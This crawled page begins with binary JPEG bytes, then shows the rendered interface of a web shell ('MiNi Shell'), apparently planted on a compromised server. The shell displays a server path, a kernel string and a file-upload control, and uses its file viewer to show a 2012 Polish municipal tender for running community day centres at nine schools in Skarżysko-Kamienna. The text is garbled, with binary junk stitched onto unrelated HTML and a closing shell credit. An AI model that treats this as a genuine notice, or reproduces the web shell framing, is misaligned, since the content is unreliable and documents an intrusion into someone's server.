JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121219/519296-N-2012.html

<p class="kh_header"><b>Skarżysko-Kamienna: Prowadzenie świetlic środowiskowych                                                na terenie Gminy  Skarżysko-Kamienna</b><br>
<b>Numer ogłoszenia: 519296 - 2012; data zamieszczenia: 19.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Skarżysko-Kamienna , ul. Sikorskiego 18, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 2520100, faks 041 2520200.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie świetlic środowiskowych                                                na terenie Gminy  Skarżysko-Kamienna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : wykonanie usługi polegającej na prowadzeniu świetlic środowiskowych na terenie Gminy Skarżysko-Kamienna w ramach realizacji zadania 3 pkt 9 Rozdziału III Gminnego Programu Profilaktyki i Rozwiązywania Problemów Alkoholowych oraz Przeciwdziałania Narkomanii dla Miasta Skarżyska-Kamiennej na rok 2013. Przedmiot zamówienia został podzielony na 9 części - zadań.
I CZĘŚĆ	Zadanie Nr 1 -  Prowadzenie świetlicy środowiskowej przy Zespole Placówek Oświatowych nr 2 Szkoła Podstawowa nr 1 przy  ul Konarskiego 20 w Skarżysku-Kam. w ramach opieki nad dziećmi  i prowadzenia dokumentacji
II CZĘŚĆ	Zadanie Nr 2 -  Prowadzenie świetlicy środowiskowej przy Zespole Placówek Oświatowych Szkoła Podstawowa nr 2  ul. Zwycięzców 13 w Skarżysku-Kam. w ramach opieki nad dziećmi i prowadzenia dokumentacji
III CZĘŚĆ	Zadanie Nr 3 -  Prowadzenie świetlicy środowiskowej przy Zespole Placówek Oświatowych nr 3 Szkoła Podstawowa  nr 3  ul. Sportowa 30 w Skarżysku-Kam. w ramach opieki nad dziećmi  i prowadzenia dokumentacji
IV CZĘŚĆ	Zadanie Nr 4 -  Prowadzenie świetlicy środowiskowej przy Zespole Szkół Publicznych                Nr 4- Szkoła Podstawowa nr 4 ul. Książęca 149   w Skarżysku-Kam. w ramach opieki nad dziećmi i prowadzenia dokumentacji
V CZĘŚĆ	Zadanie Nr 5 -  Prowadzenie świetlicy środowiskowej przy Zespole Placówek Oświatowych nr 4 Szkoła Podstawowa Nr 5 ul. Norwida 3 w Skarżysku-Kam. w ramach opieki nad dziećmi i prowadzenia dokumentacji
VI CZĘŚĆ	Zadanie Nr 6 -  Prowadzenie świetlicy środowiskowej przy Zespole Placówek Oświatowych nr 5 Szkoła Podstawowa nr 7  ul. Zielna 29 w Skarżysku-Kam. w ramach opieki nad dziećmi  i prowadzenia dokumentacji
VII CZĘŚĆ	Zadanie Nr 7 -  Prowadzenie świetlicy środowiskowej przy Szkole Podstawowej nr 8                     ul. Podjazdowa 21 w Skarżysku-Kam. w ramach opieki nad dziećmi   i prowadzenia dokumentacji
VIII CZĘŚĆ	Zadanie Nr 8 -  Prowadzenie świetlicy środowiskowej przy Szkole Podstawowej nr 9                  ul. Warszawska 54 w Skarżysku-Kam. w ramach opieki nad dziećmi    i prowadzenia dokumentacji
IX CZĘŚĆ	Zadanie Nr 9 -  Prowadzenie świetlicy środowiskowej przy Zespole Szkół Publicznych nr 1 Szkoła Podstawowa  nr 13 ul. Sezamkowa 23  w Skarżysku-Kam. w ramach opieki nad dziećmi   i prowadzenia dokumentacji

Dotyczy części I - IX:

Prowadzenie świetlicy odbywać się będzie 5 dni roboczych w tygodniu (we wszystkie dni nauki szkolnej) po 4 godzin dziennie wraz z obowiązkowym uczestnictwem w szkoleniach podnoszących kompetencje wychowawcze oraz imprezach organizowanych przez Wydział Zdrowia i Polityki Społecznej. Prowadzenie poszczególnych świetlic polega na sprawowaniu opieki nad dziećmi  w świetlicy środowiskowej oraz na prowadzeniu dokumentacji.
Opieka nad dziećmi polega w szczególności na:
-	organizacji zajęć świetlicowych, tworzeniu warunków do aktywnego i twórczego udziału dzieci w zajęciach, rozwijaniu zainteresowań, tworzeniu bezpiecznego środowiska zabawy i wypoczynku dla dzieci, wspieraniu w trudnościach szkolnych, posiadaniu wiedzy na temat dysfunkcji występujących w rodzinie, zapewnieniu dzieciom należytej opieki i bezpieczeństwa, 
-	współpracy z Miejskim Ośrodkiem Pomocy Społecznej, ze szkołami, psychologiem i pedagogiem szkolnym, placówką służby zdrowia, 
-	pomocy w sytuacjach kryzysowych szkolnych, rodzinnych, rówieśniczych i osobistych w oparciu o diagnozę indywidualną dziecka i jego rodziny;
-	prowadzenie dokumentacji pracy z wychowankami (listy obecności wychowanków, wykaz tematów prowadzonych zajęć w danym dniu), sporządzaniu miesięcznych harmonogramów zajęć, sporządzaniu miesięcznych sprawozdań z pracy świetlicy;
-	zajęcia będą obejmować systematyczną opieką wychowanków z grup ryzyka i rodzin niewydolnych wychowawczo (lista podopiecznych dołączona po podpisaniu umowy).
-	zamawiający zastrzega sobie prawo do nadzoru i oceny jakości świadczonej usługi w zakresie sprawowania opieki nad dziećmi przez Wykonawcę. Nadzór i ocenę będzie dokonywała osoba wyznaczona przez Zamawiającego. Wykonawca podda się także kontroli, w tym niezapowiedzianej, przez uprawnione organy nadzoru i kontroli.

Dokładny opis zamówienia, dla każdej z części, znajduje się w zał. 8   Opis przedmiotu zamówienia


2.	Warunki i sposób realizacji przedmiotu zamówienia zostały określone we wzorze umowy stanowiącym załącznik nr 5  do siwz . (wzór jest taki sam dla każdego z zadań ) oraz opisie przedmiotu zamówienia zał. Nr 8 do siwz..

3.	  Wspólny Słownik Zamówień (CPV):   85312110-3 Usługi opieki dziennej nad dziećmi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy części I - IX:
Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia                               nie wymaga posiadania specjalnych uprawnień. 
Ocena spełnienia warunku będzie dokonana na podstawie złożonego oświadczenia                                  o spełnieniu warunku zgodnie ze wzorem - załącznik nr 3.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części I, II, III, IV, V, VI , VII, VIII i IX  - Zadanie Nr 1, 2, 3, 4, 5, 6 ,7,  8 i 9

Wykonawca winien wykazać, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej  jedną usługę polegającą na prowadzeniu świetlicy np. środowiskowej lub innej o charakterze opiekuńczo-wychowawczym wraz z opieką nad dziećmi , świadczoną  przez okres co najmniej                             2  miesięcy dla jednego zamawiającego -  z podaniem jej wartości, przedmiotu,  dat wykonania                           i odbiorcy oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana należycie .

Ocena spełnienia warunku będzie dokonana na podstawie złozonego Wykazu usług zgodnie                     ze wzorem - załącznik nr 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części I - IX:
	Zamawiający nie wyznacza szczegółowego warunku  w tym zakresie. Warunek ten zostanie spełniony jeżeli Wykonawca  złoży oświadczenie, że dysponuje potencjałem technicznym                       do wykonania zamówienia .
Ocena spełnienia warunku będzie dokonana na podstawie złożonego oświadczenia o spełnieniu warunku zgodnie ze wzorem - załącznik nr 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części I - IX:
	Wykonawca winien wykazać, że dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia tj. jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia (prowadzącą świetlicę ) posiadającą wykształcenie  wyższe na jednym z kierunków: pedagogika, pedagogika specjalna, psychologia, praca socjalna, nauki w rodzinie lub na innym kierunku w zakresie resocjalizacji, pracy socjalnej, pedagogiki opiekuńczo-wychowawczej albo na innym kierunku uzupełnione studiami podyplomowymi w zakresie psychologii, pedagogiki, nauk o rodzinie lub resocjalizacji ( zgodnie z Rozporządzeniem Ministra Polityki Społecznej z dnia  19 października 2007 roku w sprawie placówek opiekuńczo-wychowawczych Dz.U. z 30.10.2007 r. Nr 201 poz. 1455 ). Dopuszcza się ukończenie studiów wyższych na wybranym kierunku nauczycielskim z przygotowaniem pedagogicznym.

Ocena spełnienia warunku będzie dokonana na podstawie złożonego Wykazu osób zgodnie ze wzorem - załącznik nr 7.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
Dotyczy części I - IX:  Ocena spełnienia warunku będzie dokonana na podstawie złożonego oświadczenia  o spełnieniu warunku zgodnie ze wzorem - załącznik nr 3.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Uwaga:
Zgodnie z art. 26 ust. 2b Pzp Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
4.	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia.
  Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza    
 
5.	Pisemne zobowiązanie innych podmiotów tj. o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, w przypadku, gdy Wykonawca będzie polegał na ich wiedzy i doświadczeniu przy wykonywaniu zamówienia; osobach zdolnych do wykonania zamówienia.
   Wymagana forma dokumentu - oryginał</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany postanowień niniejszej umowy jeżeli Wykonawca z przyczyn losowych np. (choroby) nie jest w stanie realizować zadania. Wykonawca będzie zobowiązany odpracować w innych terminach i godzinach uzgodnionych z Zamawiającym. W takim przypadku dopuszcza się w ramach trwania umowy możliwość odpracowania w dni wolne.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
ul.Sikorskiego 18
26-110 Skarżysko-Kamienna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2013 godzina 12:00, miejsce: Urząd Miasta
ul. Sikorskiego 18
26-110 Skarżysko-Kamienna
Biuro Obsługi Interesanta parter pok. nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com